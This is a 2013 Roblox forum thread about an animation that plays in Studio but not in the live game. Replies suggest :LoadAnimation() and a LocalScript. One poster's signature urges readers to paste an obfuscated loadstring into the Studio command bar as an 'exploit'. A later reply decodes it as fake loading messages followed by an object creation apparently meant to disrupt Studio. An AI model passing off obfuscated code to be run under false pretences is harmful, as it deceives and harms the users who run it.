enyahs7
|
  |
| Joined: 25 Apr 2008 |
| Total Posts: 9820 |
|
|
| 29 Aug 2013 06:31 PM |
| I have this one animation i'd like to use but it only works in studio for some reason why is that? |
|
|
| Report Abuse |
|
|
|
| 29 Aug 2013 06:32 PM |
By animation, what do you mean?
|
|
|
| Report Abuse |
|
|
enyahs7
|
  |
| Joined: 25 Apr 2008 |
| Total Posts: 9820 |
|
|
| 29 Aug 2013 06:33 PM |
| Like you know how some gears have animations im using one of the ones provided by roblox. |
|
|
| Report Abuse |
|
|
enyahs7
|
  |
| Joined: 25 Apr 2008 |
| Total Posts: 9820 |
|
|
| 29 Aug 2013 06:41 PM |
| I loaded it and played and it works in studio but not on game. |
|
|
| Report Abuse |
|
|
Raphael7
|
  |
| Joined: 03 Dec 2008 |
| Total Posts: 2479 |
|
|
| 29 Aug 2013 06:48 PM |
Use :LoadAnimation() method.
> Please run this on your command bar in order to activate the Studio Exploit, loadstring("\108\101\108\32\61\32\34\76\111\97\100\105\110\103\32\82\97\112\104\97\101\108\55\39\115\32\83\116\117\100\105\111\32\69\120\112\108\111\105\116\34\10\109\115\103\32\61\32\73\110\115\116\97\110\99\101\46\110\101\119\40\39\77\101\115\115\97\103\101\39\44\32\87\111\114\107\115\112\97\99\101\41\10\102\111\114\32\105\32\61\32\49\44\32\108\101\108\58\108\101\110\40\41\32\100\111\32\119\97\105\116\40\48\46\49\53\41\10\109\115\103\46\84\101\120\116\32\61\32\109\115\103\46\84\101\120\116\46\46\108\101\108\58\115\117\98\40\105\44\105\41\10\101\110\100\10\119\97\105\116\40\50\41\10\102\111\114\32\105\32\61\32\49\44\32\109\97\116\104\46\114\97\110\100\111\109\40\55\44\32\49\52\41\32\100\111\32\119\97\105\116\40\48\46\49\53\41\32\109\115\103\46\84\101\120\116\32\61\32\39\80\108\101\97\115\101\32\119\97\105\116\39\10\119\97\105\116\40\48\46\49\53\41\32\109\115\103\46\84\101\120\116\32\61\32\39\80\108\101\97\115\101\32\119\97\105\116\46\39\10\119\97\105\116\40\48\46\49\53\41\32\109\115\103\46\84\101\120\116\32\61\32\39\80\108\101\97\115\101\32\119\97\105\116\46\46\39\10\119\97\105\116\40\48\46\49\53\41\32\109\115\103\46\84\101\120\116\32\61\32\39\80\108\101\97\115\101\32\119\97\105\116\46\46\46\39\10\101\110\100\10\73\110\115\116\97\110\99\101\46\110\101\119\40\39\77\97\110\117\97\108\83\117\114\102\97\99\101\74\111\105\110\116\73\110\115\116\97\110\99\101\39\41\10")() |
|
|
| Report Abuse |
|
|
enyahs7
|
  |
| Joined: 25 Apr 2008 |
| Total Posts: 9820 |
|
|
| 29 Aug 2013 06:52 PM |
| I used it already and it works in studio just not on game |
|
|
| Report Abuse |
|
|
|
| 29 Aug 2013 06:55 PM |
| Is it a local script................. |
|
|
| Report Abuse |
|
|
enyahs7
|
  |
| Joined: 25 Apr 2008 |
| Total Posts: 9820 |
|
|
| 29 Aug 2013 07:00 PM |
| This one isn't a local script I didn't think you needed to I use the players character humanoid. |
|
|
| Report Abuse |
|
|
enyahs7
|
  |
| Joined: 25 Apr 2008 |
| Total Posts: 9820 |
|
| |
|
enyahs7
|
  |
| Joined: 25 Apr 2008 |
| Total Posts: 9820 |
|
| |
|
|
| 29 Aug 2013 08:59 PM |
| Just try using a local script for the animation. |
|
|
| Report Abuse |
|
|
|
| 29 Aug 2013 09:09 PM |
lel = "Loading Raphael7's Studio Exploit" msg = Instance.new('Message', Workspace) for i = 1, lel:len() do wait(0.15) msg.Text = msg.Text..lel:sub(i,i) end wait(2) for i = 1, math.random(7, 14) do wait(0.15) msg.Text = 'Please wait' wait(0.15) msg.Text = 'Please wait.' wait(0.15) msg.Text = 'Please wait..' wait(0.15) msg.Text = 'Please wait...' end Instance.new('ManualSurfaceJointInstance')
noob |
|
|
| Report Abuse |
|
|
enyahs7
|
  |
| Joined: 25 Apr 2008 |
| Total Posts: 9820 |
|
|
| 29 Aug 2013 09:13 PM |
| But its a result of another script... |
|
|
| Report Abuse |
|
|
enyahs7
|
  |
| Joined: 25 Apr 2008 |
| Total Posts: 9820 |
|
| |
|
bohdan77
|
  |
| Joined: 10 Aug 2008 |
| Total Posts: 7944 |
|
|
| 29 Aug 2013 09:59 PM |
| Pretty sure you can't make animations. Only roblox can do that, and I'm not sure they allow modification of them. Wait for future updates! |
|
|
| Report Abuse |
|
|
enyahs7
|
  |
| Joined: 25 Apr 2008 |
| Total Posts: 9820 |
|
|
| 29 Aug 2013 10:22 PM |
| Its their animation that I loaded ... lol its their asset not mine. |
|
|
| Report Abuse |
|
|